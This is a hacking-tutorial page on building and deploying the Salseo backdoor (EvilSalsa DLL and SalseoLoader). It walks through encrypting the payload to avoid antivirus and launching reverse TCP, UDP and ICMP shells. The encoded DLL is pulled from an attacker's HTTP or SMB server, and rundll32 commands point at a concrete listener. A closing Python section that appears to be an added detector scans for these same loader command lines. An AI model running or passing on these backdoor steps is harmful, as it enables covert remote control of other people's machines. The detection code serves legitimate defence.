
Salseo

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Compiling the binaries

Download the source code from GitHub and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.

Compile both projects for the architecture of the Windows machine where you are going to use them (if Windows supports x64, compile them for that architecture).

You can select the architecture inside Visual Studio in the "Build" tab under "Platform Target".

(If you cannot find these options, click on the "Project" tab and then on "<Project Name> Properties")

Then, build both projects (Build -> Build Solution). The path of the executable will appear in the build output.

Preparing the backdoor

First of all, you will need to encode EvilSalsa.dll. To do so, you can use the Python script encrypterassembly.py or you can compile the EncrypterAssembly project:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, now you have everything you need to run the whole Salseo thing: the encoded EvilSalsa.dll and the SalseoLoader binary.

Upload the SalseoLoader.exe binary to the machine. They should not be detected by any antivirus...

Running the backdoor

Getting a TCP reverse shell (downloading the encoded dll through HTTP)

Remember to start nc as the reverse shell listener and an HTTP server to serve the encoded evilsalsa.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (downloading the encoded dll through SMB)

Remember to start nc as the reverse shell listener, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting an ICMP reverse shell (encoded dll already present on the victim)

This time you will need a special tool on the client side to receive the reverse shell. Download: https://github.com/inquisb/icmpsh

Disable ICMP replies:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

# When you finish, you can enable them again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Run the client:

python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"

Inside the victim, let's run salseo:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as a DLL exporting the main function

Open the SalseoLoader project using Visual Studio.

Add before the main function: [DllExport]

Install DllExport for this project

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

Search for the DllExport package (using the Browse tab) and press Install (and accept the popup)

The files DllExport.bat and DllExport_Configure.bat have now appeared in your project folder

Uninstall DllExport

Press Uninstall (yes, it's weird but trust me, it is necessary)

Exit Visual Studio and execute DllExport_configure

Just exit Visual Studio

Then, go to your SalseoLoader folder and execute DllExport_Configure.bat

Select x64 (if you are going to use it on an x64 machine, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply

Open the project again with Visual Studio

[DllExport] should no longer be marked as an error

Build the solution

Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

Select the x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

To build the solution: Build --> Build Solution (the path of the new DLL will appear in the output console)

Test the generated DLL

Copy and paste the DLL where you want to test it.

Execute:

rundll32.exe SalseoLoader.dll,main

If no error appears, you probably have a functional DLL!

Get a shell using the DLL

Don't forget to use an HTTP server and set up an nc listener

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
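As an added defensive example (not part of the Salseo project or of the original page), the following Python scans process-creation records for the two launch shapes shown on this page: rundll32.exe loading a DLL from outside the Windows system directories through a "main" export, and a loader command line carrying a reversetcp/reverseudp/reverseicmp mode keyword right after a payload location. The event field names and all sample command lines are constructed assumptions.

```python
import re
import shlex

MODES = {"reversetcp", "reverseudp", "reverseicmp"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample process-creation events (not real telemetry).
EVENTS = [
    {"pid": 4120, "cmdline": r"rundll32.exe C:\Users\bob\Downloads\SalseoLoader.dll,main"},
    {"pid": 4121, "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"pid": 4122, "cmdline": r"SalseoLoader.exe password http://10.2.0.5/evilsalsa.dll.txt reversetcp 10.2.0.5 1337"},
    {"pid": 4123, "cmdline": r"SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp 10.2.0.5"},
    {"pid": 4124, "cmdline": r'"C:\Program Files\App\app.exe" --mode normal'},
]

def split_args(cmdline):
    # Non-POSIX mode keeps backslashes literal, which suits Windows paths.
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline.split()

def rundll32_finding(args):
    # Flag rundll32 invoking a 'main' export from a DLL outside system dirs.
    if len(args) < 2 or not args[0].lower().endswith("rundll32.exe"):
        return None
    dll, _, export = args[1].partition(",")
    if export.lower() != "main" or dll.strip('"').lower().startswith(SYSTEM_DIRS):
        return None
    return f"rundll32 loading non-system DLL {dll} via export 'main'"

def looks_like_payload(arg):
    # URL, UNC share, or local drive path: the three forms used by the loader.
    a = arg.strip('"').lower()
    return "://" in a or a.startswith("\\\\") or re.match(r"^[a-z]:[\\/]", a) is not None

def loader_finding(args):
    # Flag a mode keyword immediately preceded by a payload location.
    for i in range(2, len(args)):
        if args[i].lower() in MODES and looks_like_payload(args[i - 1]):
            return f"loader mode '{args[i]}' with payload {args[i - 1]}"
    return None

def scan(events):
    # Returns (pid, message) for every event matching either signature.
    findings = []
    for ev in events:
        args = split_args(ev["cmdline"])
        for check in (rundll32_finding, loader_finding):
            msg = check(args)
            if msg:
                findings.append((ev["pid"], msg))
    return findings
```

Running scan(EVENTS) reports pids 4120, 4122 and 4123; the shell32 control-panel call and the ordinary application launch are left alone.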